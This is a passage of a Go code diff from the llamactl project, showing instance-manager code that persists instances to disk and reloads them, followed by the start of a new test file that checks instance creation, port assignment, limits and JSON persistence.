||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
go func(name string, inst *instance.Process) {
|
||||||
|
defer wg.Done()
|
||||||
|
fmt.Printf("Stopping instance %s...\n", name)
|
||||||
|
// Attempt to stop the instance gracefully
|
||||||
|
if err := inst.Stop(); err != nil {
|
||||||
|
fmt.Printf("Error stopping instance %s: %v\n", name, err)
|
||||||
|
}
|
||||||
|
}(name, inst)
|
||||||
|
}
|
||||||
|
|
||||||
|
wg.Wait()
|
||||||
|
fmt.Println("All instances stopped.")
|
||||||
|
}
|
||||||
|
|
||||||
|
// loadInstances restores all instances from disk
|
||||||
|
func (im *instanceManager) loadInstances() error {
|
||||||
|
if im.instancesConfig.InstancesDir == "" {
|
||||||
|
return nil // Persistence disabled
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check if instances directory exists
|
||||||
|
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
|
||||||
|
return nil // No instances directory, start fresh
|
||||||
|
}
|
||||||
|
|
||||||
|
// Read all JSON files from instances directory
|
||||||
|
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("failed to read instances directory: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
loadedCount := 0
|
||||||
|
for _, file := range files {
|
||||||
|
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
instanceName := strings.TrimSuffix(file.Name(), ".json")
|
||||||
|
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
|
||||||
|
|
||||||
|
if err := im.loadInstance(instanceName, instancePath); err != nil {
|
||||||
|
log.Printf("Failed to load instance %s: %v", instanceName, err)
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
loadedCount++
|
||||||
|
}
|
||||||
|
|
||||||
|
if loadedCount > 0 {
|
||||||
|
log.Printf("Loaded %d instances from persistence", loadedCount)
|
||||||
|
// Auto-start instances that have auto-restart enabled
|
||||||
|
go im.autoStartInstances()
|
||||||
|
}
|
||||||
|
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// loadInstance loads a single instance from its JSON file
|
||||||
|
func (im *instanceManager) loadInstance(name, path string) error {
|
||||||
|
data, err := os.ReadFile(path)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("failed to read instance file: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var persistedInstance instance.Process
|
||||||
|
if err := json.Unmarshal(data, &persistedInstance); err != nil {
|
||||||
|
return fmt.Errorf("failed to unmarshal instance: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Validate the instance name matches the filename
|
||||||
|
if persistedInstance.Name != name {
|
||||||
|
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create new inst using NewInstance (handles validation, defaults, setup)
|
||||||
|
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions())
|
||||||
|
|
||||||
|
// Restore persisted fields that NewInstance doesn't set
|
||||||
|
inst.Created = persistedInstance.Created
|
||||||
|
inst.Running = persistedInstance.Running
|
||||||
|
|
||||||
|
// Check for port conflicts and add to maps
|
||||||
|
if inst.GetOptions() != nil && inst.GetOptions().Port > 0 {
|
||||||
|
port := inst.GetOptions().Port
|
||||||
|
if im.ports[port] {
|
||||||
|
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
|
||||||
|
}
|
||||||
|
im.ports[port] = true
|
||||||
|
}
|
||||||
|
|
||||||
|
im.instances[name] = inst
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
|
||||||
|
func (im *instanceManager) autoStartInstances() {
|
||||||
|
im.mu.RLock()
|
||||||
|
var instancesToStart []*instance.Process
|
||||||
|
for _, inst := range im.instances {
|
||||||
|
if inst.Running && // Was running when persisted
|
||||||
|
inst.GetOptions() != nil &&
|
||||||
|
inst.GetOptions().AutoRestart != nil &&
|
||||||
|
*inst.GetOptions().AutoRestart {
|
||||||
|
instancesToStart = append(instancesToStart, inst)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
im.mu.RUnlock()
|
||||||
|
|
||||||
|
for _, inst := range instancesToStart {
|
||||||
|
log.Printf("Auto-starting instance %s", inst.Name)
|
||||||
|
// Reset running state before starting (since Start() expects stopped instance)
|
||||||
|
inst.Running = false
|
||||||
|
if err := inst.Start(); err != nil {
|
||||||
|
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
892
pkg/manager/manager_test.go
Normal file
892
pkg/manager/manager_test.go
Normal file
@@ -0,0 +1,892 @@
|
|||||||
|
package manager_test
|
||||||
|
|
||||||
|
import (
|
||||||
|
"encoding/json"
|
||||||
|
"llamactl/pkg/backends/llamacpp"
|
||||||
|
"llamactl/pkg/config"
|
||||||
|
"llamactl/pkg/instance"
|
||||||
|
"llamactl/pkg/manager"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"reflect"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestNewInstanceManager(t *testing.T) {
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
LogsDir: "/tmp/test",
|
||||||
|
MaxInstances: 5,
|
||||||
|
LlamaExecutable: "llama-server",
|
||||||
|
DefaultAutoRestart: true,
|
||||||
|
DefaultMaxRestarts: 3,
|
||||||
|
DefaultRestartDelay: 5,
|
||||||
|
}
|
||||||
|
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
if manager == nil {
|
||||||
|
t.Fatal("NewInstanceManager returned nil")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Test initial state
|
||||||
|
instances, err := manager.ListInstances()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ListInstances failed: %v", err)
|
||||||
|
}
|
||||||
|
if len(instances) != 0 {
|
||||||
|
t.Errorf("Expected empty instance list, got %d instances", len(instances))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_Success(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
inst, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if inst.Name != "test-instance" {
|
||||||
|
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
|
||||||
|
}
|
||||||
|
if inst.Running {
|
||||||
|
t.Error("New instance should not be running")
|
||||||
|
}
|
||||||
|
if inst.GetOptions().Port != 8080 {
|
||||||
|
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_DuplicateName(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create first instance
|
||||||
|
_, err := manager.CreateInstance("test-instance", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("First CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Try to create duplicate
|
||||||
|
_, err = manager.CreateInstance("test-instance", options2)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for duplicate instance name")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "already exists") {
|
||||||
|
t.Errorf("Expected duplicate name error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
|
||||||
|
// Create manager with low max instances limit
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
MaxInstances: 2, // Very low limit for testing
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options3 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create instances up to the limit
|
||||||
|
_, err := manager.CreateInstance("instance1", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err = manager.CreateInstance("instance2", options2)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// This should fail due to max instances limit
|
||||||
|
_, err = manager.CreateInstance("instance3", options3)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error when exceeding max instances limit")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
|
||||||
|
t.Errorf("Expected max instances error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_PortAssignment(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
// Create instance without specifying port
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
inst, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should auto-assign a port in the range
|
||||||
|
port := inst.GetOptions().Port
|
||||||
|
if port < 8000 || port > 9000 {
|
||||||
|
t.Errorf("Expected port in range 8000-9000, got %d", port)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_PortConflictDetection(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080, // Explicit port
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model2.gguf",
|
||||||
|
Port: 8080, // Same port - should conflict
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create first instance
|
||||||
|
_, err := manager.CreateInstance("instance1", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Try to create second instance with same port
|
||||||
|
_, err = manager.CreateInstance("instance2", options2)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for port conflict")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
|
||||||
|
t.Errorf("Expected port conflict error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create multiple instances and verify they get different ports
|
||||||
|
instance1, err := manager.CreateInstance("instance1", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
instance2, err := manager.CreateInstance("instance2", options2)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
port1 := instance1.GetOptions().Port
|
||||||
|
port2 := instance2.GetOptions().Port
|
||||||
|
|
||||||
|
if port1 == port2 {
|
||||||
|
t.Errorf("Expected different ports, both got %d", port1)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_PortExhaustion(t *testing.T) {
|
||||||
|
// Create manager with very small port range
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 8001}, // Only 2 ports available
|
||||||
|
MaxInstances: 10, // Higher than available ports
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options3 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create instances to exhaust all ports
|
||||||
|
_, err := manager.CreateInstance("instance1", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err = manager.CreateInstance("instance2", options2)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// This should fail due to port exhaustion
|
||||||
|
_, err = manager.CreateInstance("instance3", options3)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error when ports are exhausted")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
|
||||||
|
t.Errorf("Expected port exhaustion error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDeleteInstance_PortRelease(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create instance with specific port
|
||||||
|
_, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Delete the instance
|
||||||
|
err = manager.DeleteInstance("test-instance")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("DeleteInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should be able to create new instance with same port
|
||||||
|
_, err = manager.CreateInstance("new-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetInstance_Success(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
// Create an instance first
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
created, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Retrieve it
|
||||||
|
retrieved, err := manager.GetInstance("test-instance")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if retrieved.Name != created.Name {
|
||||||
|
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetInstance_NotFound(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
_, err := manager.GetInstance("nonexistent")
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for nonexistent instance")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "not found") {
|
||||||
|
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestListInstances(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
// Initially empty
|
||||||
|
instances, err := manager.ListInstances()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ListInstances failed: %v", err)
|
||||||
|
}
|
||||||
|
if len(instances) != 0 {
|
||||||
|
t.Errorf("Expected 0 instances, got %d", len(instances))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create some instances
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err = manager.CreateInstance("instance1", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err = manager.CreateInstance("instance2", options2)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// List should return both
|
||||||
|
instances, err = manager.ListInstances()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ListInstances failed: %v", err)
|
||||||
|
}
|
||||||
|
if len(instances) != 2 {
|
||||||
|
t.Errorf("Expected 2 instances, got %d", len(instances))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check names are present
|
||||||
|
names := make(map[string]bool)
|
||||||
|
for _, inst := range instances {
|
||||||
|
names[inst.Name] = true
|
||||||
|
}
|
||||||
|
if !names["instance1"] || !names["instance2"] {
|
||||||
|
t.Error("Expected both instance1 and instance2 in list")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDeleteInstance_Success(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
// Create an instance
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
_, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Delete it
|
||||||
|
err = manager.DeleteInstance("test-instance")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("DeleteInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should no longer exist
|
||||||
|
_, err = manager.GetInstance("test-instance")
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Instance should not exist after deletion")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDeleteInstance_NotFound(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
err := manager.DeleteInstance("nonexistent")
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for deleting nonexistent instance")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "not found") {
|
||||||
|
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestUpdateInstance_Success(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
// Create an instance
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
_, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Update it
|
||||||
|
newOptions := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/new-model.gguf",
|
||||||
|
Port: 8081,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
updated, err := manager.UpdateInstance("test-instance", newOptions)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("UpdateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
|
||||||
|
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
|
||||||
|
}
|
||||||
|
if updated.GetOptions().Port != 8081 {
|
||||||
|
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestUpdateInstance_NotFound(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err := manager.UpdateInstance("nonexistent", options)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for updating nonexistent instance")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "not found") {
|
||||||
|
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestPersistence_InstancePersistedOnCreation(t *testing.T) {
|
||||||
|
// Create temporary directory for persistence
|
||||||
|
tempDir := t.TempDir()
|
||||||
|
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
InstancesDir: tempDir,
|
||||||
|
MaxInstances: 10,
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create instance
|
||||||
|
_, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check that JSON file was created
|
||||||
|
expectedPath := filepath.Join(tempDir, "test-instance.json")
|
||||||
|
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
|
||||||
|
t.Errorf("Expected persistence file %s to exist", expectedPath)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify file contains correct data
|
||||||
|
data, err := os.ReadFile(expectedPath)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Failed to read persistence file: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var persistedInstance map[string]interface{}
|
||||||
|
if err := json.Unmarshal(data, &persistedInstance); err != nil {
|
||||||
|
t.Fatalf("Failed to unmarshal persisted data: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if persistedInstance["name"] != "test-instance" {
|
||||||
|
t.Errorf("Expected name 'test-instance', got %v", persistedInstance["name"])
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestPersistence_InstancePersistedOnUpdate(t *testing.T) {
|
||||||
|
tempDir := t.TempDir()
|
||||||
|
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
InstancesDir: tempDir,
|
||||||
|
MaxInstances: 10,
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
// Create instance
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
_, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Update instance
|
||||||
|
newOptions := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/new-model.gguf",
|
||||||
|
Port: 8081,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
_, err = manager.UpdateInstance("test-instance", newOptions)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("UpdateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify persistence file was updated
|
||||||
|
expectedPath := filepath.Join(tempDir, "test-instance.json")
|
||||||
|
data, err := os.ReadFile(expectedPath)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Failed to read persistence file: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var persistedInstance map[string]interface{}
|
||||||
|
if err := json.Unmarshal(data, &persistedInstance); err != nil {
|
||||||
|
t.Fatalf("Failed to unmarshal persisted data: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check that the options were updated
|
||||||
|
options_data, ok := persistedInstance["options"].(map[string]interface{})
|
||||||
|
if !ok {
|
||||||
|
t.Fatal("Expected options to be present in persisted data")
|
||||||
|
}
|
||||||
|
|
||||||
|
if options_data["model"] != "/path/to/new-model.gguf" {
|
||||||
|
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %v", options_data["model"])
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestPersistence_InstanceFileDeletedOnDeletion(t *testing.T) {
|
||||||
|
tempDir := t.TempDir()
|
||||||
|
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
InstancesDir: tempDir,
|
||||||
|
MaxInstances: 10,
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
// Create instance
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
_, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
expectedPath := filepath.Join(tempDir, "test-instance.json")
|
||||||
|
|
||||||
|
// Verify file exists
|
||||||
|
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
|
||||||
|
t.Fatal("Expected persistence file to exist before deletion")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Delete instance
|
||||||
|
err = manager.DeleteInstance("test-instance")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("DeleteInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify file was deleted
|
||||||
|
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
|
||||||
|
t.Error("Expected persistence file to be deleted")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestPersistence_InstancesLoadedFromDisk(t *testing.T) {
|
||||||
|
tempDir := t.TempDir()
|
||||||
|
|
||||||
|
// Create JSON files manually (simulating previous run)
|
||||||
|
instance1JSON := `{
|
||||||
|
"name": "instance1",
|
||||||
|
"running": false,
|
||||||
|
"options": {
|
||||||
|
